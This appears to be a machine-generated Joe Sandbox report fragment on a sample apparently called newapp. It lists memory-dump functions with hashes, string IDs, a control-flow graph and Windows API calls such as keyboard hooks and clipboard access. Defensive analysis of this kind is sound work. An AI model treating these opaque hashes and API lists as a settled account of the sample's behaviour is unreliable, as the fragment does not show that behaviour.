                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020
                                                                                                                • Opcode ID: ae5eb8e57807a46a66bf31e6b8893b990b43af739a1fbff3dc8717e715540e3b
                                                                                                                • Instruction ID: 6caae142963723abc703b9c60ea26c3751622094e978b3a54e275fbe133478fc
                                                                                                                • Opcode Fuzzy Hash: ae5eb8e57807a46a66bf31e6b8893b990b43af739a1fbff3dc8717e715540e3b
                                                                                                                • Instruction Fuzzy Hash: 31616330F002189FDB549FA8C8547AEBBF6EB88710F208529E109EB395DF754D458BA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1274 6679228-667925d 1276 667925f-6679262 1274->1276 1277 6679b20-6679b23 1276->1277 1278 6679268-667927d 1276->1278 1279 6679b25-6679b44 1277->1279 1280 6679b49-6679b4b 1277->1280 1284 6679295-66792ab 1278->1284 1285 667927f-6679285 1278->1285 1279->1280 1282 6679b52-6679b55 1280->1282 1283 6679b4d 1280->1283 1282->1276 1287 6679b5b-6679b65 1282->1287 1283->1282 1292 66792b6-66792b8 1284->1292 1288 6679287 1285->1288 1289 6679289-667928b 1285->1289 1288->1284 1289->1284 1293 66792d0-6679341 1292->1293 1294 66792ba-66792c0 1292->1294 1305 6679343-6679366 1293->1305 1306 667936d-6679389 1293->1306 1295 66792c4-66792c6 1294->1295 1296 66792c2 1294->1296 1295->1293 1296->1293 1305->1306 1311 66793b5-66793d0 1306->1311 1312 667938b-66793ae 1306->1312 1317 66793d2-66793f4 1311->1317 1318 66793fb-6679416 1311->1318 1312->1311 1317->1318 1323 667943b-6679449 1318->1323 1324 6679418-6679434 1318->1324 1325 667944b-6679454 1323->1325 1326 6679459-66794d3 1323->1326 1324->1323 1325->1287 1332 66794d5-66794f3 1326->1332 1333 6679520-6679535 1326->1333 1337 66794f5-6679504 1332->1337 1338 667950f-667951e 1332->1338 1333->1277 1337->1338 1338->1332 1338->1333
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 1a04512cbd11c7adec24ea83074d1aaa192e2f7e635423be91b46bdf6eab0de2
                                                                                                                • Instruction ID: 1c4f150f1bdcaa1d5b08284ab190ff222e2190d6bf19644e163a2f89a30fdd4b
                                                                                                                • Opcode Fuzzy Hash: 1a04512cbd11c7adec24ea83074d1aaa192e2f7e635423be91b46bdf6eab0de2
                                                                                                                • Instruction Fuzzy Hash: 26514F30B102059FDB54EB75D9A0BAF77F6ABC8748F108529D409EB789EA349C43CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq
                                                                                                                • API String ID: 0-936005338
                                                                                                                • Opcode ID: 3bf952fa9e02c7a0fadd19b236f181e2aaf788b5ebcedf8e233a9a825540b430
                                                                                                                • Instruction ID: 8061c1c8cc13a82cbddbf2e773b3ff5a08fa8bdf0dbb7e6518cbd15a7ceed9db
                                                                                                                • Opcode Fuzzy Hash: 3bf952fa9e02c7a0fadd19b236f181e2aaf788b5ebcedf8e233a9a825540b430
                                                                                                                • Instruction Fuzzy Hash: 7E517170F002089FDB55DFB9C854BAEBBF6EF88710F208529E105AB395DE758D018BA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: da0b982645b8c7c8da6e863033e4f5fff751eb3978791ed3f8bc72a73a40ffa4
                                                                                                                • Instruction ID: 748119c633f5b046f164e9b81339d37e2fb99d5697d436695273b62fbb9a89c9
                                                                                                                • Opcode Fuzzy Hash: da0b982645b8c7c8da6e863033e4f5fff751eb3978791ed3f8bc72a73a40ffa4
                                                                                                                • Instruction Fuzzy Hash: 76B19C70A007059FCB84EF6AD49166EBBF2FF88314B10896DE40ACB355DB74E846CB94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2925916993.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_28c0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32dd4d43fdf5b3e6c020af177319ade1698d6f28e3f235819f2d6bb3790b3b4f
                                                                                                                • Instruction ID: 35b20aa0242e0f47cb5c368a2ac1436a01009f6fa79def01c5f2bb34216ca6d2
                                                                                                                • Opcode Fuzzy Hash: 32dd4d43fdf5b3e6c020af177319ade1698d6f28e3f235819f2d6bb3790b3b4f
                                                                                                                • Instruction Fuzzy Hash: CA414371D043858FCB00CFB9D8046AEBFF5EF89310F1586AAD408EB692DB749844CBA1
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666686A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: fc5a4cbf93325c84039da84183f6f49be6b56626c61f034ad889ae832e0d59aa
                                                                                                                • Instruction ID: d6513e278569321d0774d74e7f451feae84a4cd23dc37a3de9c3c68443082e2c
                                                                                                                • Opcode Fuzzy Hash: fc5a4cbf93325c84039da84183f6f49be6b56626c61f034ad889ae832e0d59aa
                                                                                                                • Instruction Fuzzy Hash: E951C3B5D00319AFDB14CFAAD984ADEBFB5BF48310F24852AE419AB310D771A845CF91
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666686A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 4db249f43975086398eef173998436631f94d6833fe92ff01479a148ca1489c9
                                                                                                                • Instruction ID: 04c9f641de20486c97a97a69b6b4a2ebe25fb70a159a2ca570f03766bc1c19b7
                                                                                                                • Opcode Fuzzy Hash: 4db249f43975086398eef173998436631f94d6833fe92ff01479a148ca1489c9
                                                                                                                • Instruction Fuzzy Hash: 0641B1B1D00319AFDB14CFAAD984ADEBFB5FF48310F24852AE419AB210D771A845CF91
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0666B851
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: a6ae80c800db1e0cf88649a189724a5f941cbf339edabf2d8c9d5dc1d61d0eb3
                                                                                                                • Instruction ID: 027341800e82c70fc406437c693077d72e9477c32e2ee6012e8ca8ece83d6b0d
                                                                                                                • Opcode Fuzzy Hash: a6ae80c800db1e0cf88649a189724a5f941cbf339edabf2d8c9d5dc1d61d0eb3
                                                                                                                • Instruction Fuzzy Hash: C74129B4900309DFDB54CF5AD448AAABBF5FB88314F14C459E519AB321D770A851CFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: 37b874d9aa69a7fa76dea05a706c2b6529b52c740ef6c6952173aa13f9788f5b
                                                                                                                • Instruction ID: cdae2cf2a779bfe004ae0326290829d035778fe4aaee5123fb0eb7a2d28f539d
                                                                                                                • Opcode Fuzzy Hash: 37b874d9aa69a7fa76dea05a706c2b6529b52c740ef6c6952173aa13f9788f5b
                                                                                                                • Instruction Fuzzy Hash: 9D3102B0E01648EFDB54DFA9D984BCEBBF5AB48304F248019E444BB290DB74A945CBA5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: 2ff9cdb9d2a7973ede4d7897ac55e78eb3e4cef168a5cd12463c7a794dd1cb29
                                                                                                                • Instruction ID: eccbbd3890d7c72080da8d516cd2482a969681e4e7490da5790dcc06830015a5
                                                                                                                • Opcode Fuzzy Hash: 2ff9cdb9d2a7973ede4d7897ac55e78eb3e4cef168a5cd12463c7a794dd1cb29
                                                                                                                • Instruction Fuzzy Hash: 4331F1B0E01608EFDB54DF9AD984BCEBBF5AF48304F248019E404AB390D774A945CF95
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0666A577
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 82deec54695f95e93ae1ad7c912312a93d2e2ba2b08c9d4144471c9db6a3cfaa
                                                                                                                • Instruction ID: 95cab71f03d18b60b94aeb18ae721f77210d01069b2d1a3d60b07a25ef1dd253
                                                                                                                • Opcode Fuzzy Hash: 82deec54695f95e93ae1ad7c912312a93d2e2ba2b08c9d4144471c9db6a3cfaa
                                                                                                                • Instruction Fuzzy Hash: F821E3B5900258EFDB10CFAAD984ADEBFF8EB48310F14801AE954A3310C374A944CFA5
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0666A577
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 21bc2c7c12d11c690d7e274df027dab0d0063fad31efeaa3fbd3074016c0b516
                                                                                                                • Instruction ID: a292eab9b62832331eedeb7f26d8c660ccf15d6dc236f137698f43ddfd1990cb
                                                                                                                • Opcode Fuzzy Hash: 21bc2c7c12d11c690d7e274df027dab0d0063fad31efeaa3fbd3074016c0b516
                                                                                                                • Instruction Fuzzy Hash: 4721E4B5D00218DFDB10CF9AD984ADEBBF4FB48310F14801AE914A3310C374A944CFA4
                                                                                                                APIs
                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0666DF23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 199ea7d3412a1feb376bbc98b6fad7d53c88521d05186b07ba762ae52ba37717
                                                                                                                • Instruction ID: 71efed487377a5b52258f9cf131855a0c06e334c88d03ee7b45d3d749432ecbe
                                                                                                                • Opcode Fuzzy Hash: 199ea7d3412a1feb376bbc98b6fad7d53c88521d05186b07ba762ae52ba37717
                                                                                                                • Instruction Fuzzy Hash: 4F210FB5D002499FCB54CF9AD844BEEFBF5AF88324F10842AE459A7250CB74A944CFA5
                                                                                                                APIs
                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0666DF23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: f55dabfea6908cbf9ae9fd4f70b41922c317630ceab52088ffe6722faaa47dd5
                                                                                                                • Instruction ID: 67df3f31aa28458296d51b4acf6f982e223288dcae3645639109a100cc57d34a
                                                                                                                • Opcode Fuzzy Hash: f55dabfea6908cbf9ae9fd4f70b41922c317630ceab52088ffe6722faaa47dd5
                                                                                                                • Instruction Fuzzy Hash: EF2110B5D002498FCB54CF9AD844BEEFBF5AF88320F10842AE458A7250CB74A944CFA5
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 06665716
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 73fe381b8bc04d8f7e6917b278a5a34d96ac883352c446924a3ee41e637f9bb0
                                                                                                                • Instruction ID: a0cad242e3179fd4f7e36987211cbeefc1f40dc65d87ab847a2d2e7dab161c02
                                                                                                                • Opcode Fuzzy Hash: 73fe381b8bc04d8f7e6917b278a5a34d96ac883352c446924a3ee41e637f9bb0
                                                                                                                • Instruction Fuzzy Hash: 841134B5C00249CFCB20CF9AD845ADEFBF5AB89310F10842AE419B7310C375A545CFA5
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 028CEFE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2925916993.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_28c0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 8cad126ba0a714cce8fead8a3e442573eb937195be97b494b680cfd587b20be4
                                                                                                                • Instruction ID: 0d7be1659cda669dcb3893ca429a1a3556d38e5ea786444a37dbef9c7cc6dde9
                                                                                                                • Opcode Fuzzy Hash: 8cad126ba0a714cce8fead8a3e442573eb937195be97b494b680cfd587b20be4
                                                                                                                • Instruction Fuzzy Hash: 151123B5C006699FCB10CF9AC544BDEFBF4BF48320F10816AE818A7240D378A944CFA5
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 06665716
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 4755d5785f6006019687161d9263bdb205ce8ad7277d7d2a2cd94fc3cef0b769
                                                                                                                • Instruction ID: 2138fbf494b16dfa925d46c963416be452e0b543b5a6e8e46467e969bfd3560e
                                                                                                                • Opcode Fuzzy Hash: 4755d5785f6006019687161d9263bdb205ce8ad7277d7d2a2cd94fc3cef0b769
                                                                                                                • Instruction Fuzzy Hash: DF1102B5C00349CFDB10DF9AD449ADEFBF5EB88220F10846AE869B7610C375A545CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0666BFED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: e72c01ca2969afafd80b7276f87249c60138048940778e4c61d77b6aa216484c
                                                                                                                • Instruction ID: 382d78e059518ada3244456ff807ed4faebc2b6522493d690b43957a81ea0772
                                                                                                                • Opcode Fuzzy Hash: e72c01ca2969afafd80b7276f87249c60138048940778e4c61d77b6aa216484c
                                                                                                                • Instruction Fuzzy Hash: E71142B4900348CFCB60DF9AE448BDEBBF4EB48320F20841AE558A7310C374A944CFA4
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0666BAA5), ref: 0666BB2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: 5b612c929785fafa9ad29b02ff28e3de6eee54edf322519dbdc060baf4f22085
                                                                                                                • Instruction ID: ff55c49ad7d1ffe4cccb44dde515eb61f59aff794295aae15354561e345517ac
                                                                                                                • Opcode Fuzzy Hash: 5b612c929785fafa9ad29b02ff28e3de6eee54edf322519dbdc060baf4f22085
                                                                                                                • Instruction Fuzzy Hash: 2911F2B5804248CFCB60DF9AD489B9EBBF4EB48324F208459E959A7250C774A944CFA5
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0666BAA5), ref: 0666BB2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: 61c5bbff76776d9dcb7f6da9038bc69cf754649e2381dc059f8b15810b123a82
                                                                                                                • Instruction ID: 59aa416bed28566be15086f5b96a4fb2319fdce92ad4f1331e10aa1ab95a49ef
                                                                                                                • Opcode Fuzzy Hash: 61c5bbff76776d9dcb7f6da9038bc69cf754649e2381dc059f8b15810b123a82
                                                                                                                • Instruction Fuzzy Hash: C61115B5800248CFCB10DF9AD985BDEFBF8EB48324F208419E559A7350C774A944CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0666BFED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6660000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: dae195e02092b5145bf9c8b625fc818ca3ff5bae554ec86d5760d34758b4fbef
                                                                                                                • Instruction ID: 2accd84c4e54665403f6078d3a6c6d3e20f46ebc808366d7d45313b3bfc42f54
                                                                                                                • Opcode Fuzzy Hash: dae195e02092b5145bf9c8b625fc818ca3ff5bae554ec86d5760d34758b4fbef
                                                                                                                • Instruction Fuzzy Hash: 3E1112B5900248CFCB20DF9AD548BDEBFF8EB48324F208459E558A7310C375A544CFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: bfea6a568ec120be331bd2c0422f964329fa9cf075a28c838dd94666ce1de6e5
                                                                                                                • Instruction ID: 06d590d22946e4599aa95c03c41d86b9a9b50d2e3e5176a275be9e65cce833cc
                                                                                                                • Opcode Fuzzy Hash: bfea6a568ec120be331bd2c0422f964329fa9cf075a28c838dd94666ce1de6e5
                                                                                                                • Instruction Fuzzy Hash: 1341A170E007099FDB55DFA5C95469EBBB6FF85300F204929E405E7340EBB1E946CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 7ab22774888960d0cf36dc39428c6cae46df5c2fbd94e6747d276fca37505033
                                                                                                                • Instruction ID: 95a75e98ed23eacb98744ab44bdc7bb1ff79b0c5cfb258e2793bef43f1c9b17c
                                                                                                                • Opcode Fuzzy Hash: 7ab22774888960d0cf36dc39428c6cae46df5c2fbd94e6747d276fca37505033
                                                                                                                • Instruction Fuzzy Hash: 3C31E030B002018FDB49AB74D52466F7BE6AFC9704F208438D406DB395EE39DE46CBA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \Ocq
                                                                                                                • API String ID: 0-2995510325
                                                                                                                • Opcode ID: df2f523a1c8a3243579a0ab1ec0d2addc3237f4637794d1a6b138f65adf6b167
                                                                                                                • Instruction ID: ca1be279af60b3eb98e44e6ab0d9efb9d1b870161fd25a4a3917fb4ddc2b49dd
                                                                                                                • Opcode Fuzzy Hash: df2f523a1c8a3243579a0ab1ec0d2addc3237f4637794d1a6b138f65adf6b167
                                                                                                                • Instruction Fuzzy Hash: 44F0DA30A50119DBDB14DF94E899BAEBBB2FF88B00F204119E402A7394CB741D02CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 18fe940dd28aebfe8d43192477af11dffe9004f727090848f91dbfd54178d539
                                                                                                                • Instruction ID: 87b0d3d894ab3ddbd0289467220074761bb30c6dbdc62dceea59a1bd2876aedf
                                                                                                                • Opcode Fuzzy Hash: 18fe940dd28aebfe8d43192477af11dffe9004f727090848f91dbfd54178d539
                                                                                                                • Instruction Fuzzy Hash: 9061C071F004114FCF549A7EC88466FAAD7AFC4624F15443AD80EDB364DE65ED0287D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 733e3697beada7310f4ae4b9f61f2cd1fb5831e97753119a6f61945e1e984a85
                                                                                                                • Instruction ID: 482d9bdf168dee8cb669938563ed986ecef8455e039abf47671407fd676b2637
                                                                                                                • Opcode Fuzzy Hash: 733e3697beada7310f4ae4b9f61f2cd1fb5831e97753119a6f61945e1e984a85
                                                                                                                • Instruction Fuzzy Hash: 1C813A30B002099FDB54DFA9D5547AEB7F2AB89304F248529D40AEB395EF34ED428B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 27c9c0cb35f19805f8c479155f4e8a30f379f24691e3c88e2693f78c22c35f5a
                                                                                                                • Instruction ID: ee17e2a8a63502b8525d0de6bb50730307af1980b89adb8ca52b366b56de8b1a
                                                                                                                • Opcode Fuzzy Hash: 27c9c0cb35f19805f8c479155f4e8a30f379f24691e3c88e2693f78c22c35f5a
                                                                                                                • Instruction Fuzzy Hash: B4914E34E106198FDF60DF68C890B9DB7B1FF89310F208599D449AB395EB70AA85CF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a9dcb390e1c36c55d7d66b36c14bac20b5c0ae7fd323a5fbdb8f113278fd08fc
                                                                                                                • Instruction ID: 0ad4c5f6ce2d07a08b43c8b1e1acf16e101f82977cd71b0a226a6000ee7b97ef
                                                                                                                • Opcode Fuzzy Hash: a9dcb390e1c36c55d7d66b36c14bac20b5c0ae7fd323a5fbdb8f113278fd08fc
                                                                                                                • Instruction Fuzzy Hash: BC914D34E102198BDF60DF68C880B9DB7B1FF89310F208599D54DAB355EB70AA85CF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_6670000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e7c726f467318c3395cdc261310eaabefb3e09271d41e754aae0a707519e03f
                                                                                                                • Instruction ID: 78434b4d83c1d4e369d61f05aeb9aa1efff0490bcd8b0ae4a6c8723929f85774
                                                                                                                • Opcode Fuzzy Hash: 4e7c726f467318c3395cdc261310eaabefb3e09271d41e754aae0a707519e03f
